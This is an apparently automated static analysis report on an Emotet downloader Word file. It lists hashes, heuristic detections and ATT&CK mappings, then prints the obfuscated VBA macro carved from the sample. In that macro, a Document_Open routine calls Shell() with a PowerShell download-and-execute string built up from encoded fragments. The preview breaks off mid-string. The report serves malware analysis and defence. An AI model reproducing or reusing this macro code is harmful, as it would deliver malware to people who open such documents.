Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ee6769dfdddd7ec…

MALICIOUS

Office (OLE)

Size: 107.0 KB
Created: 2018-06-19 10:50:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: f22ec1e1eafb18f7b53506263dcc1ad5
SHA-1: 339604cdd0dc890673a343de23cc40a4757d9263
SHA-256: 5ee6769dfdddd7ece5a6a04b2fb456ff9093c9d02b97ffb17a118f078a311062
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, which is a strong indicator of a downloader. ClamAV identifies the file as 'Doc.Downloader.Emotet-7349882-0', suggesting it's part of a known downloader family. The VBA script itself is heavily obfuscated, but the presence of the Shell() call and the ClamAV signature strongly suggest its purpose is to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7349882-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7349882-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12381 bytes
SHA-256: 8fc1575e5d3938ccb64157c8e69104c7af494b2f6d735913b26754a8099af428
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kmIbiCNdvNo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FUsjShqvRQ()
On Error Resume Next
bcRmt = 39485
DYtWi = CByte(sRsiX)
iojon = ZOXAwL
UTQvJ = CDate(12501)
kTNGdb = CDate(TtjktW + Sin(36122 + 20849) * 65959 * CInt(7979))
IfMkoq = 34184
uwAzh = 15697
AmJlMa = CByte(SBvflj)
LzGdNL = IElAqO
EhXiC = CDate(54634)
KiWrm = CDate(krjpF + Sin(36518 + 71052) * 26239 * CInt(70086))
QffbqE = 74733
ZWuaVG = 49553
vBUqL = CByte(wwAztN)
hihar = YGYSA
BDudCY = CDate(51340)
JXjERZ = CDate(jmqiil + Sin(79590 + 98077) * 41687 * CInt(46728))
Sizfmi = 77399
uJNPNI = 22165
BLEYEl = CByte(sGifVf)
shsGZD = SGiIvj
ARioX = CDate(99179)
GDUhmX = CDate(VRNiz + Sin(88008 + 10081) * 24239 * CInt(25528))
lLvuI = 69906
FUsjShqvRQ = SYAAmhzrZQR + Chr$(pBMXthawX + 80 + SlFLa) + "OwerSH" + dtOVtBP + whhTcqpKPtN + lmiZrznp + jkMfFwjbCz + XMsOVG
SNSXoV = 95325
lGoEG = CByte(qHdjAW)
aduESO = OclZD
joOZk = CDate(76993)
nwKEcl = CDate(TZjkhA + Sin(93461 + 38600) * 54432 * CInt(39814))
EhAinv = 69553
VVXhuw = 36057
SMMuh = CByte(LDijw)
JQtWz = GzoMM
OIouWk = CDate(62887)
ANjjkQ = CDate(HWWXS + Sin(79980 + 85815) * 19828 * CInt(48436))
dLJPTU = 8437
End Function
Function fCSDq(AhOIOzwBvV)
On Error Resume Next
jJRFDj = 23239
iGWwP = CByte(NUncDN)
NQvwoc = RqGzNN
jwDsb = CDate(86784)
OCWXF = CDate(jzwoTQ + Sin(77188 + 96795) * 41332 * CInt(65851))
cnAub = 68544
sWBNWz = 18631
ZbLNNi = CByte(zMaaj)
zAiRqo = BDsdj
Onjlk = CDate(52075)
dnEtwr = CDate(uukSd + Sin(62317 + 59195) * 34087 * CInt(59528))
blXSJ = 73280
FOvbHu = WzNrzA + Shell(JlTdzWJzz + AhOIOzwBvV + HrwVFEM, 40973 - 40973)
RPVJQ = 5011
HzAbzI = CByte(mksZnw)
bpBftV = mYTWSF
svzrKa = CDate(17296)
FNVfHW = CDate(iYBnMM + Sin(7670 + 6105) * 32010 * CInt(62568))
SarmFR = 322
End Function
Private Sub Document_open()
On Error Resume Next
BFTXz = 73226
osiKj = CByte(TfaUzs)
HVdzuR = GZiXk
wQIGw = CDate(21299)
lMQKOb = CDate(ovLWV + Sin(2445 + 28200) * 68368 * CInt(53207))
Naosmc = 52619
vIsik = 28779
drGOoU = CByte(bhuquw)
wcOzH = vicTGM
pwiDz = CDate(95657)
jJcGAP = CDate(NlUKC + Sin(38729 + 54192) * 66000 * CInt(46845))
bnRCz = 65109
Application.Run RmbzNnpE + "fCSDq" + YXauEhbALu, SBEIRb + FUsjShqvRQ + PvrRsBT
IoFnNv = 49391
ricHXa = CByte(UjvZL)
wojUSh = XWwjQ
YXvFAb = CDate(86731)
lRfAt = CDate(HWalL + Sin(46264 + 29264) * 81498 * CInt(96221))
iNUjJ = 12161
zGdaz = 96657
JNnRi = CByte(EGMsY)
jBrGcB = HFCCpc
DKHiv = CDate(32030)
MrYrrF = CDate(kusKIU + Sin(38434 + 47594) * 94505 * CInt(19943))
JJmRlV = 92081
End Sub


Attribute VB_Name = "woKOBjDk"
Function dtOVtBP()
On Error Resume Next
TrEMLw = CDate(pZXYr + Sin(30956 + 42045) * 20637 * CInt(92364))
Rcsuo = CDate(32295)
RVqhpi = 10853
fzjmQ = CByte(KELck)
wtYmmf = 51491
LUGnt = kuzdVp
TKiljiwpiq = "ell . ( $" + "sHeLLID[1]+$she" + "LLiD[13]+'" + "x') (" + Chr(34) + " $(SeT-i" + "TEm 'vArIab"
TdjfVm = CDate(frPJMz + Sin(18437 + 59491) * 95542 * CInt(28798))
MUhzw = CDate(51972)
VoOYkj = 75460
UjGjVi = CByte(KDZwU)
YnFIRr = 93355
HOZNj = hGSIT
YtSLW = "Le:ofs" + "' '' ) " + Chr(34) + "+" + "[sTRin" + "g]('42%74,69u"
ornBo = CDate(ZWkuvw + Sin(91175 + 67746) * 18897 * CInt(53133))
UhMKr = CDate(42345)
LiroTn = 31286
XIhWSq = CByte(MFFtXw)
wufiQ = 87839
PhwsCL = ZcwNJc
zLNLDiQpKu = "127!" + "71u74A" + "111" + ",46N51%46,96!" + "10" + "7!121!35" + ",97&108!100M10" + "7%109u122%" + "46&124M111"
QAtha = CDate(oiChAw + Sin(96194 + 48314) * 31744 * CInt(6511))
LBLMIl = CDate(98312)
isPqV = 21940
bDfKGP = CByte(KXNmfq)
MZzZmi = 33621
MNlWR = kDtSqD
ApftPKSN = "%96j106!97" + "A99A5" + "3!42f79N12" + "3,86A101"
YmllfY = CDate(QiGrF + Sin(23965 + 30805) * 60877 * CInt(10887))
jSziXV = CDate(51938)
oKVoL = 8418
rdmlII = CByte(YNfwEI)
njErF = 820
VQAmuo = JtHrX
bNwzjDYZ = "&1" + "20&46u5" + "1%46,96%1" + "07
... (truncated)